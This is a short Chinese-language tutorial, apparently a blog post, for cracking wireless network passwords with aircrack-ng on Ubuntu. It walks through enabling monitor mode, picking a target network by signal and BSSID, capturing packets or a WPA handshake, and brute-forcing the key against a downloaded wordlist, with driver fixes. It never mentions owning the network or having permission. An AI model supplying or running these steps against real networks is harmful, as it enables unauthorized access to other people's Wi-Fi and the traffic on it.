方法:
1.確保你的無線是打開的:ifconfig看是否有wlan0或別的無線適配器已經啟動,如果沒有,後面的步驟都執行不了
可以先用ifconfig -a看是否有無線適配器,再用ifconfig wlan0 up命令啟動無線適配器(wlan0為ifconfig -a中查找到的無線適配器名稱)
2.激活網卡為監聽模式:
sudo airmon-ng start wlan0
3.查看無線網絡,開始抓取無線數據包
sudo airodump-ng mon0
這時就會顯示你當前可以搜索到的無線信號,PWR是信號值,數值越大表示信號越強,ESSID就是這個信號的名稱.ENC為加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)
找到一個你希望破解的essid
4.確定目標後
sudo airodump-ng -c 6 --bssid target's MAC -w file mon0
-c 6是指這個信號的頻道
5.收到足夠的包之後(即data),開始破解
sudo aircrack-ng file-01.cap
如果是wep類型的密碼,在收到足夠多的包之後(1w)可以直接破解
如果是wpa/wpa2類型的加密方式,則必須收到握手包之後才能開始暴力破解並且需要使用密碼文件(給出一個地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密碼足夠復雜的話這樣的密碼文件也是不夠的,需要自己去下更復雜的加密文件
sudo aircrack-ng -w dic file-01.cap
破解成功就能拿到密碼了
Ubuntu破解時出現mon0 is on channel -1, but the AP uses channel 1 的解決辦法
http://aircrack-ng.org/doku.php?id=compat-wireless
最後的driver-name是你的網卡對應的sudo modprobe iwlwifi(可以用./scripts/driver-select找找看)
如果是intel 5100的無線網卡,請使用13.5的驅動程序,太高版本的驅動版本可能會用不了
Aircrack-ng 的詳細介紹:請點這裡
Aircrack-ng 的下載地址:請點這裡
